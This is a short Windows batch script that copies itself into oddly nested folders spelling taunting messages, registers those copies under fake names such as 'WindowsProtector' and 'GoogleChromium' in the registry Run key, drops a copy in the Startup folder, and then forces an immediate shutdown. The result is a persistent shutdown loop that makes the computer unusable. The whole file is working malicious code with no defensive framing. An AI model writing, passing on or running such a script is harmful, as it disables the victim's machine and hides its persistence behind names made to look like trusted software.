md "C:\Users\Public\Music\H\a\v\e\Y\o\u\E\v\e\n\E\v\e\r\U\s\e\d\T\h\i\s\F\o\l\d\e\r\ \" 2>nul
copy %0 C:\Users\Public\Music\H\a\v\e\Y\o\u\E\v\e\n\E\v\e\r\U\s\e\d\T\h\i\s\F\o\l\d\e\r\cocroyale.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleChromium /t REG_SZ /d "C:\Users\Public\Music\H\a\v\e\Y\o\u\E\v\e\n\E\v\e\r\U\s\e\d\T\h\i\s\F\o\l\d\e\r\cocroyale.bat" /f
md "C:\Temp\Y\o\u\M\i\g\h\t\B\e\H\e\r\e\F\o\r\A\W\h\i\l\e\ \" 2>nul
copy %0 C:\Temp\Y\o\u\M\i\g\h\t\B\e\H\e\r\e\F\o\r\A\W\h\i\l\e\tookYouLongEnough.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftRazor /t REG_SZ /d "C:\Temp\Y\o\u\M\i\g\h\t\B\e\H\e\r\e\F\o\r\A\W\h\i\l\e\tookYouLongEnough.bat" /f
md "%APPDATA%\FriendlyApp\H\o\w\I\s\Y\o\u\r\L\i\f\e\G\o\i\n\g\ \" 2>nul
copy %0 %APPDATA%\FriendlyApp\H\o\w\I\s\Y\o\u\r\L\i\f\e\G\o\i\n\g\iHopeWell.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsProtector /t REG_SZ /d "%APPDATA%\FriendlyApp\H\o\w\I\s\Y\o\u\r\L\i\f\e\G\o\i\n\g\iHopeWell.bat" /f
copy %0 "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\bleh.bat"
shutdown -s -t 0 -f -y